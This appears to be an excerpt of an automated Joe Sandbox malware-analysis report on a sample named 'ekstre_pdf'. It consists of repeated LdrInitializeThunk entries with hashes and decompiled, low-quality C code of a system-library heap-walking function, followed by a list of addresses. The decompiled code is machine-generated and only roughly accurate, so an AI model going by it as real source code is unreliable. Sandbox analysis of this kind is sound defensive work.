LdrInitializeThunk.NTDLL ref: 340A2DAA

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0e7de820c05bdf8f8998cc9cad2a9b89773cd43865bb4c9b45d6551a560c9841
Instruction ID: e9c84c53bf16b7f3985bada901777793d7e65ce9562cb9d9277896c8e3fe4290
Opcode Fuzzy Hash: 0e7de820c05bdf8f8998cc9cad2a9b89773cd43865bb4c9b45d6551a560c9841
Instruction Fuzzy Hash: A190022270100503D90171584544656000A47E0285F91C467A5815516ECA35C996B135

Uniqueness

Uniqueness Score: -1.00%

Function 340A2DC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 340A2DCA

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 59c0d27ec43204e1d2ca1f97029088900b36d69eaa5e9f77944e274e827e103a
Instruction ID: ddc203ac6bc3fae3d22756f8b28cd8c413de08e816315222a5977414525c1282
Opcode Fuzzy Hash: 59c0d27ec43204e1d2ca1f97029088900b36d69eaa5e9f77944e274e827e103a
Instruction Fuzzy Hash: 5F90027230100403D94071584544786000547E0345F51C456A9855515EC669CDD97669

Uniqueness

Uniqueness Score: -1.00%

Function 340A2E50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 340A2E5A

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 829f5531ef9e27b98f0235a49c8d32e293a267a16a310db9c941c1cbd2bf8d5b
Instruction ID: 26604d19bdb60022570bb365e2b608b2b7360d888e6c9c017e71f4bd5967a885
Opcode Fuzzy Hash: 829f5531ef9e27b98f0235a49c8d32e293a267a16a310db9c941c1cbd2bf8d5b
Instruction Fuzzy Hash: 3890026234100443D90061584554B46000587F1345F51C45AE5855515DC629CC56712A

Uniqueness

Uniqueness Score: -1.00%

Function 340A2EB0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 340A2EBA

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1823552e79c2c69a9fc72ee923443b5a90083b82b01363cd4b006b7b47dbdd7c
Instruction ID: 90024bad0718622a1362d0523bc2e64acfd97b44da107e32b8565a94b447ffb6
Opcode Fuzzy Hash: 1823552e79c2c69a9fc72ee923443b5a90083b82b01363cd4b006b7b47dbdd7c
Instruction Fuzzy Hash: 1C90023230140403D9006158495474B000547E0346F51C456A5955516DC635C8557575

Uniqueness

Uniqueness Score: -1.00%

Function 340A2ED0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 340A2EDA

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 78fa41d74b008d98b0556c20a892a100efa2778b1bda29a11b1287541404315f
Instruction ID: bf974c4c2868e327b3ab3f22b3306e7597c9858dcd650881945f0810a07c6b40
Opcode Fuzzy Hash: 78fa41d74b008d98b0556c20a892a100efa2778b1bda29a11b1287541404315f
Instruction Fuzzy Hash: D19002227010004389407168898494640056BF1255751C566A4D89511DC569C8696669

Uniqueness

Uniqueness Score: -1.00%

Function 340A2F00 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 340A2F0A

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 702d9d06abfdbf622944835900df2c4cec2529d6a7ac5693413dba9fd1dc05cc
Instruction ID: 32ef695fb55e3529545edd3591799a727b88ae02a2a81a2cd2038ee6dfdc2cd4
Opcode Fuzzy Hash: 702d9d06abfdbf622944835900df2c4cec2529d6a7ac5693413dba9fd1dc05cc
Instruction Fuzzy Hash: 0890022231180043DA0065684D54B47000547E0347F51C55AA4945515CC925C8656525

Uniqueness

Uniqueness Score: -1.00%

Function 340A29F0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 340A29FA

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9b9244cd9946243eb4036b19d25aea906c9c9cb0e53478399a036a7540646e03
Instruction ID: 97ea24189c521af1af67f9845e8a4dd7b27d06c1b86c29ad8e96636c35b56620
Opcode Fuzzy Hash: 9b9244cd9946243eb4036b19d25aea906c9c9cb0e53478399a036a7540646e03
Instruction Fuzzy Hash: 21900226311000034905A5580744547004647E5395351C466F5806511CD631C8656125

Uniqueness

Uniqueness Score: -1.00%

Function 340A2A80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 340A2A8A

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d66a97da5f1ad9cd93b13b48a1e04a96ba021774cf76e64941ef4c07333a838f
Instruction ID: 4eeec4d899f369a37766fe756270e4cd1c653d254cefeab1a5751f0498524f35
Opcode Fuzzy Hash: d66a97da5f1ad9cd93b13b48a1e04a96ba021774cf76e64941ef4c07333a838f
Instruction Fuzzy Hash: BD90026230200003890571584554656400A47F0245B51C466E5805551DC535C8957129

Uniqueness

Uniqueness Score: -1.00%

Function 340A2B10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 340A2B1A

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0f858d610296e521088037920ca98a7f04d05665dbb33060645cac17d4a211c8
Instruction ID: 353e6069e076c848059b693162624fedb57ed107ab32c7760018e6fb997badca
Opcode Fuzzy Hash: 0f858d610296e521088037920ca98a7f04d05665dbb33060645cac17d4a211c8
Instruction Fuzzy Hash: A690023230100803D9807158454468A000547E1345F91C45AA4816615DCA25CA5D77A5

Uniqueness

Uniqueness Score: -1.00%

Function 340A2B90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 340A2B9A

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fc24e9888219a6352da23c83b3b5f1ee4cc45850396c7bee83e444a39862014e
Instruction ID: fb262e4cf755f578685ecf97c395be3db8f09631ca8e9be501c9ed2674d16fb0
Opcode Fuzzy Hash: fc24e9888219a6352da23c83b3b5f1ee4cc45850396c7bee83e444a39862014e
Instruction Fuzzy Hash: 0E90023230108803D9106158854478A000547E0345F55C856A8C15619DC6A5C8957125

Uniqueness

Uniqueness Score: -1.00%

Function 340A2BC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 340A2BCA

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1667eee2f1e5cbce98dabf27ee430ddbefa17aa412bfc6946166b964e7eaccfb
Instruction ID: 8f84383fba4244cab42a35809d859ed4c3a165934fc6a0bb0a667886e88fb6a2
Opcode Fuzzy Hash: 1667eee2f1e5cbce98dabf27ee430ddbefa17aa412bfc6946166b964e7eaccfb
Instruction Fuzzy Hash: 5390023230100403D90065985548686000547F0345F51D456A9815516EC675C8957135

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 34109060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558
timeCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E34109060(signed int _a4, intOrPtr* _a8) {
				signed int _v8;
				short _v18;
				short _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int* _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void _v172;
				signed int _v176;
				signed int _v180;
				intOrPtr _v184;
				signed int _v188;
				short _v190;
				short _v192;
				signed int _v196;
				signed int _v198;
				signed int _v200;
				signed int _v204;
				signed int _v206;
				void _v208;
				signed int* _v212;
				signed int _v214;
				void* _v216;
				intOrPtr _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				char _v233;
				char _v236;
				signed int _v240;
				signed int _v241;
				intOrPtr* _v244;
				intOrPtr _v248;
				signed int _v249;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t299;
				signed int _t310;
				signed int _t315;
				signed int _t316;
				signed int _t321;
				signed int _t322;
				char* _t323;
				signed int _t325;
				signed int _t329;
				signed int _t333;
				signed int* _t334;
				signed int _t349;
				signed int _t352;
				signed int _t357;
				signed int _t367;
				signed int _t373;
				intOrPtr _t422;
				signed int _t423;
				signed int _t424;
				void* _t427;
				signed int _t429;
				signed int _t431;
				signed int _t434;
				void* _t435;
				signed int _t436;
				intOrPtr _t444;
				signed int _t448;
				signed int _t452;
				void _t458;
				signed int _t461;
				signed int _t464;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t471;
				signed int _t472;
				intOrPtr _t475;
				intOrPtr _t478;
				signed int _t480;
				intOrPtr* _t484;
				void* _t485;
				intOrPtr _t488;
				intOrPtr _t489;
				signed int _t492;
				signed int _t495;
				signed int _t496;
				signed int _t499;
				void* _t500;
				signed int _t501;
				signed int _t503;

				_t503 = (_t501 & 0xfffffff8) - 0xec;
				_v8 =  *0x3415b370 ^ _t503;
				_t299 = _a8;
				_t499 = _a4;
				_t434 = 0;
				_t482 =  *_t299;
				_t484 =  *((intOrPtr*)(_t299 + 4));
				_v204 = _t482;
				_v232 =  *((intOrPtr*)(_t299 + 8));
				_v228 = _t484;
				_v68 = 0;
				if( *((intOrPtr*)(_t499 + 8)) != 0xddeeddee) {
					__eflags =  *(_t499 + 0x44) & 0x01000000;
					_v233 = 0;
					_v212 = 0;
					if(( *(_t499 + 0x44) & 0x01000000) == 0) {
						goto L2;
					} else {
						_t310 = 0xc0000002;
						goto L98;
					}
				} else {
					_v233 = 1;
					_v212 = _t499;
					L2:
					if(_t482 != 0x80000000) {
						E340A8F40( &_v156, _t434, 0x54);
						_t503 = _t503 + 0xc;
						_v172 = 2;
						_v168 = 0x20;
						_v164 = _t499;
						__eflags = _v233 - _t434;
						if(_v233 != _t434) {
							_t444 = _v212;
							_v160 = _t434;
							_v156 =  *(_t444 + 0x80) << 0xc;
							_v156 = _v156 + ( *(_t444 + 0x4c) << 0xc);
							_v152 =  *(_t444 + 0x84) << 0xc;
							_t81 =  &_v152;
							 *_t81 = _v152 + ( *(_t444 + 0x50) << 0xc);
							__eflags =  *_t81;
							_t310 = _t434;
						} else {
							_t482 =  &_v156;
							_v160 =  *(_t499 + 0xea) & 0x000000ff;
							_t310 = E341098AA(_t499,  &_v156,  &_v152);
						}
						__eflags = _t310;
						if(_t310 < 0) {
							L98:
							_pop(_t485);
							_pop(_t500);
							_pop(_t435);
							return E340A4B50(_t310, _t435, _v8 ^ _t503, _t482, _t485, _t500);
						} else {
							 *0x341591e0( &_v172, _v232);
							_t310 =  *_t484();
							__eflags = _t310;
							if(_t310 < 0) {
								goto L98;
							}
							_t482 = _v212;
							__eflags = _t482 - 3;
							if(_t482 < 3) {
								goto L98;
							}
							_v232 = _t434;
							__eflags = _t482 - 3;
							_v228 = _t434;
							_t448 = 7;
							_t315 = memset( &_v208, 0, _t448 << 2);
							_t503 = _t503 + 0xc;
							_t316 = _t315 & 0xffffff00 | __eflags > 0x00000000;
							_t488 = 0;
							__eflags = 0;
							_v224 = _t316;
							while(1) {
								_t482 =  &_v208;
								_t310 = E3410A388(_t499,  &_v208, _t316);
								__eflags = _t310 - 0x8000001a;
								if(_t310 == 0x8000001a) {
									break;
								}
								__eflags = _t310;
								if(_t310 < 0) {
									goto L98;
								}
								_t436 = _v198;
								__eflags = _t436 & 0x00000002;
								if((_t436 & 0x00000002) == 0) {
									__eflags = _t436 & 0x00004000;
									if((_t436 & 0x00004000) == 0) {
										__eflags = _t436 & 0x00001000;
										if((_t436 & 0x00001000) == 0) {
											__eflags = _v241;
											if(_v241 != 0) {
												L75:
												__eflags = _v212 - 4;
												_t316 = _v224;
												if(_v212 < 4) {
													continue;
												}
												L76:
												__eflags = _t436 & 0x000000f0;
												if((_t436 & 0x000000f0) == 0) {
													E340A8F40( &_v180, _t488, 0x64);
													_t503 = _t503 + 0xc;
													_v172 = _v208;
													_v164 = _v204;
													_t321 = _v188;
													_v180 = 5;
													_v176 = 0x1c;
													__eflags = _t436 & 0x00000002;
													if((_t436 & 0x00000002) != 0) {
														_t321 = _v200 & 0x000000ff;
													}
													_v160 = _t321;
													__eflags = _t436 & 0x00000001;
													if((_t436 & 0x00000001) == 0) {
														_t322 = _v168;
													} else {
														_t322 = 1;
														_v168 = 1;
													}
													__eflags = _t436 & 0x00004000;
													if((_t436 & 0x00004000) == 0) {
														__eflags = _t436 & 0x00008000;
														if((_t436 & 0x00008000) == 0) {
															goto L94;
														}
														_t325 = _t322 | 0x00000008;
														__eflags = _t325;
														goto L93;
													} else {
														_t325 = _t322 | 0x00000004;
														L93:
														_v168 = _t325;
														L94:
														_t323 =  &_v180;
														L95:
														 *0x341591e0(_t323, _v240);
														_t310 =  *_v236();
														__eflags = _t310;
														if(_t310 < 0) {
															goto L98;
														}
														L96:
														_t316 = _v232;
														continue;
													}
												}
												_t452 = _v188;
												_v56 = _v208;
												_v48 = _v204;
												_t329 = 2;
												_v40 = _t488;
												_v36 = _t488;
												_v64 = 5;
												_v60 = 0x30;
												_v52 = _t329;
												__eflags = _t329 & _t436;
												if((_t329 & _t436) != 0) {
													_t452 = _v200 & 0x000000ff;
												}
												_v44 = _t452;
												__eflags = _t436 & 0x00004000;
												if((_t436 & 0x00004000) != 0) {
													_t329 = 6;
													_v52 = _t329;
												}
												__eflags = _t436 & 0x00000001;
												if((_t436 & 0x00000001) != 0) {
													_t333 = _t329 | 0x00000001;
													__eflags = _t333;
													_v52 = _t333;
												}
												_v24 = _v196;
												_v20 = _v192;
												_v18 = _v190;
												_t323 =  &_v64;
												_v32 = 1;
												_v28 = 0x14;
												goto L95;
											}
											_t334 = _v208;
											__eflags = _t334 - _v232;
											if(_t334 < _v232) {
												L72:
												_t482 = _t334;
												E34108093(_v76, _t334,  &_v232,  &_v228,  &_v68,  &_v216);
												__eflags = _v228 - 4;
												if(_v228 < 4) {
													goto L96;
												}
												E340A8F40( &_v180, _t488, 0x64);
												_t458 = _v232;
												_t503 = _t503 + 0xc;
												_v168 = _v228 - _t458;
												_v160 = _v216;
												_v172 = _t458;
												_v180 = 4;
												_v176 = 0x20;
												_v164 = 1;
												 *0x341591e0( &_v180, _v240);
												_t310 =  *_v236();
												__eflags = _t310;
												if(_t310 < 0) {
													goto L98;
												}
												_t436 = _v206;
												goto L75;
											}
											__eflags = _t334 - _v228;
											if(_t334 <= _v228) {
												goto L75;
											}
											goto L72;
										}
										__eflags = _v212 - 4;
										_t316 = _v224;
										if(_v212 < 4) {
											continue;
										}
										E340A8F40( &_v180, _t488, 0x64);
										_t503 = _t503 + 0xc;
										_v172 = _v208;
										_t325 = _v204;
										_v180 = 4;
										_v176 = 0x20;
										_v164 = 2;
										_v160 = 1;
										goto L93;
									}
									E340A8F40( &_v172, 0, 0x5c);
									_t503 = _t503 + 0xc;
									_v180 = 3;
									_t496 = 0;
									_v176 = 0x1c;
									_v72 = 0;
									__eflags = _v241;
									if(_v241 != 0) {
										_t482 = _v208;
										_t349 = _v220 + 0x44;
										_v172 = _t482;
										__eflags =  *(_t349 + 4) & 0x00000001;
										_t496 =  *_t349;
										if(( *(_t349 + 4) & 0x00000001) != 0) {
											__eflags = _t496;
											if(_t496 == 0) {
												_t496 = 0;
											} else {
												_t496 = _t496 ^ _t349;
											}
										}
										_t461 =  *(_t349 + 4) & 1;
										while(1) {
											__eflags = _t496;
											if(_t496 == 0) {
												break;
											}
											__eflags = _t482 - ( *(_t496 + 0xc) & 0xffff0000);
											if(__eflags < 0) {
												_t352 =  *_t496;
												L54:
												__eflags = _t461;
												if(_t461 == 0) {
													L57:
													_t496 = _t352;
													continue;
												}
												__eflags = _t352;
												if(_t352 == 0) {
													goto L57;
												}
												_t496 = _t496 ^ _t352;
												continue;
											}
											if(__eflags <= 0) {
												break;
											}
											_t352 =  *(_t496 + 4);
											goto L54;
										}
										_v168 = ( *(_t496 + 0x10) & 0xfffff000) + 0x1000;
										_t357 =  *(_t496 + 0x10) & 0xfffff000;
										__eflags = _t357;
										L60:
										_v164 = _t357;
										 *0x341591e0( &_v180, _v240);
										_t310 = _v236();
										__eflags = _t310;
										if(_t310 < 0) {
											goto L98;
										}
										E340A8F40( &_v176, 0, 0x58);
										_t503 = _t503 + 0xc;
										_v184 = 0x20;
										_t464 = 4;
										_v188 = _t464;
										__eflags = _v249;
										if(_v249 != 0) {
											_v180 = _v216;
											_v176 =  *(_t496 + 0x10) & 0xfffff000;
											_t367 =  *(_v228 + 0xc) & 0x40000000;
											__eflags = _t367;
										} else {
											_t373 = _v80;
											_v180 = _t373;
											_v176 =  *((intOrPtr*)(_t373 + 0x10));
											_t367 =  *(_t499 + 0x40) & 0x00040000;
										}
										_v172 = 1;
										asm("sbb eax, eax");
										_v168 = ( ~_t367 & 0x0000003c) + _t464;
										 *0x341591e0( &_v188, _v248);
										_t310 =  *_v244();
										__eflags = _t310;
										if(_t310 < 0) {
											goto L98;
										} else {
											_t436 = _v214;
											_t488 = 0;
											goto L76;
										}
									}
									_t467 = _v208 + 0xfffffff8;
									__eflags =  *((char*)(_t467 + 7)) - 5;
									if( *((char*)(_t467 + 7)) == 5) {
										_t467 = _t467 - (( *(_t467 + 6) & 0x000000ff) << 3);
										__eflags = _t467;
									}
									_t468 = _t467 + 0xffffffe8;
									_v72 = _t468;
									_v172 = _t468 & 0xffff0000;
									_v168 =  *((intOrPtr*)(_t468 + 0x14));
									_t357 =  *(_t468 + 0x10);
									goto L60;
								}
								__eflags = _v241;
								if(_v241 != 0) {
									L30:
									_t489 = _v208;
									L31:
									E340A8F40( &_v160, 0, 0x50);
									_t469 = _v196;
									_t503 = _t503 + 0xc;
									_v172 = _t489;
									_v168 = _v192 + _t469;
									_v164 = _t469;
									_v180 = 3;
									_v176 = 0x1c;
									 *0x341591e0( &_v180, _v240);
									_t310 =  *_v236();
									__eflags = _t310;
									if(_t310 < 0) {
										goto L98;
									}
									__eflags = _v249;
									if(_v249 != 0) {
										_t471 = _v216;
										_v236 = _v204 + _t471;
										_t492 =  *(_v228 + 0xc) & 0x40000000;
										__eflags = _t492;
										L37:
										_v240 = _t471;
										asm("sbb edi, edi");
										_t495 = ( ~_t492 & 0x0000003c) + 4;
										__eflags = _t495;
										_v224 = _t495;
										L38:
										E340A8F40( &_v188, 0, 0x64);
										_t472 = _v240;
										_t503 = _t503 + 0xc;
										_v176 = _v236 - _t472;
										_v180 = _t472;
										_v188 = 4;
										_v184 = 0x20;
										_v172 = 1;
										_v168 = _t495;
										 *0x341591e0( &_v188, _v248);
										_t310 =  *_v244();
										__eflags = _t310;
										if(_t310 < 0) {
											goto L98;
										}
										_t488 = 0;
										goto L96;
									}
									__eflags = _v206 & 0x00008000;
									if((_v206 & 0x00008000) != 0) {
										_t471 = _v216;
										_v236 = _v204 + _t471;
										_t492 =  *(_t499 + 0x40) & 0x00040000;
										goto L37;
									}
									_t482 = _v84;
									E34108093(_v84, _v84,  &_v240,  &_v236,  &_v76,  &_v224);
									_t495 = _v240;
									goto L38;
								}
								__eflags = _t436 & 0x00008000;
								if((_t436 & 0x00008000) != 0) {
									goto L30;
								}
								_t475 = _v208;
								_v76 = _t475;
								__eflags = _t475 + 0x10 -  *((intOrPtr*)(_t499 + 0xa4));
								if(_t475 + 0x10 !=  *((intOrPtr*)(_t499 + 0xa4))) {
									_t489 = _t475;
								} else {
									_t489 = _t499;
								}
								goto L31;
							}
							_t310 = 0;
							__eflags = 0;
							goto L98;
						}
					}
					E340A8F40( &_v164, _t434, 0x5c);
					_t503 = _t503 + 0xc;
					_v172 = 0x80000000;
					_v168 = 0x64;
					if(_v233 == _t434) {
						_v156 =  *(_t499 + 0x7c) & 0x0000ffff;
						_v160 = 1;
						_v148 = _t499;
						_v152 =  *((intOrPtr*)( *[fs:0x30] + 0x88)) - 1;
						_v144 =  *((intOrPtr*)(_t499 + 0x1f4));
						_v140 =  *((intOrPtr*)(_t499 + 0x1f8)) -  *((intOrPtr*)(_t499 + 0x244));
						_v124 = E3410D7E5(_t499);
						_v120 =  *(_t499 + 0x74) << 3;
						_v128 =  *((intOrPtr*)(_t499 + 0x208));
						_v108 =  *((intOrPtr*)(_t499 + 0x200));
						_v132 =  *((intOrPtr*)(_t499 + 0x1fc));
						_v136 =  *((intOrPtr*)(_t499 + 0x204));
						_t422 =  *((intOrPtr*)(_t499 + 0x20c));
						_v104 = _t422;
						_v100 = _t422;
						_t423 =  *(_t499 + 0xb4);
						__eflags = _t423;
						if(_t423 != 0) {
							_t480 =  *((intOrPtr*)(_t423 + 0xc));
							_v116 = _t480;
							_t429 =  *_t423;
							__eflags = _t429;
							if(_t429 != 0) {
								_t431 =  *((intOrPtr*)(_t429 + 0xc)) + _t480;
								__eflags = _t431;
								_v116 = _t431;
							}
						}
						_t424 =  *(_t499 + 0xc8);
						_t478 =  *((intOrPtr*)(_t499 + 0x218));
						_v112 = _t478;
						__eflags = _t424;
						if(_t424 != 0) {
							_t427 =  *_t424;
							__eflags = _t427 - 0xffffffff;
							if(_t427 != 0xffffffff) {
								_t434 =  *(_t427 + 0x14);
							}
							_v112 = _t478 + _t434;
						}
					} else {
						_t482 =  &_v172;
						E341292AB(_v212,  &_v172);
					}
					 *0x341591e0( &_v172, _v232);
					_t310 =  *_t484();
					goto L98;
				}
			}

0x34109068
0x34109075
0x3410907c
0x34109081
0x34109084
0x34109086
0x34109093
0x34109096
0x3410909a
0x3410909e
0x341090a2
0x341090a9
0x341090f8
0x341090ff
0x34109103
0x34109107
0x00000000
0x34109109
0x34109109
0x00000000
0x34109109
0x341090ab
0x341090ab
0x341090b0
0x341090b4
0x341090ba
0x3410921d
0x34109222
0x34109225
0x3410922d
0x34109235
0x34109239
0x3410923d
0x3410925c
0x34109260
0x3410926d
0x34109277
0x34109284
0x3410928e
0x3410928e
0x3410928e
0x34109292
0x3410923f
0x34109246
0x3410924a
0x34109255
0x34109255
0x34109294
0x34109296
0x34109893
0x3410989a
0x3410989b
0x3410989c
0x341098a7
0x3410929c
0x341092a7
0x341092ad
0x341092af
0x341092b1
0x00000000
0x00000000
0x341092b7
0x341092bb
0x341092be
0x00000000
0x00000000
0x341092c6
0x341092cc
0x341092cf
0x341092d3
0x341092d8
0x341092d8
0x341092da
0x341092dd
0x341092dd
0x341092df
0x341092e3
0x341092e4
0x341092ea
0x341092ef
0x341092f4
0x00000000
0x00000000
0x341092fa
0x341092fc
0x00000000
0x00000000
0x34109302
0x34109306
0x34109309
0x3410947c
0x34109482
0x3410961c
0x34109622
0x34109674
0x34109679
0x34109728
0x34109728
0x3410972d
0x34109731
0x00000000
0x00000000
0x34109737
0x34109737
0x3410973a
0x34109805
0x3410980e
0x34109811
0x34109819
0x3410981d
0x34109821
0x34109829
0x34109831
0x34109834
0x34109836
0x34109836
0x3410983b
0x3410983f
0x34109842
0x3410984d
0x34109844
0x34109846
0x34109847
0x34109847
0x34109851
0x34109857
0x3410985e
0x34109864
0x00000000
0x00000000
0x34109866
0x34109866
0x00000000
0x34109859
0x34109859
0x34109869
0x34109869
0x3410986d
0x3410986d
0x34109871
0x3410987c
0x34109882
0x34109884
0x34109886
0x00000000
0x00000000
0x34109888
0x34109888
0x00000000
0x34109888
0x34109857
0x34109744
0x34109748
0x34109755
0x3410975c
0x3410975d
0x34109764
0x3410976b
0x34109776
0x34109781
0x34109788
0x3410978a
0x3410978c
0x3410978c
0x34109791
0x34109798
0x3410979e
0x341097a2
0x341097a3
0x341097a3
0x341097aa
0x341097ad
0x341097af
0x341097af
0x341097b2
0x341097b2
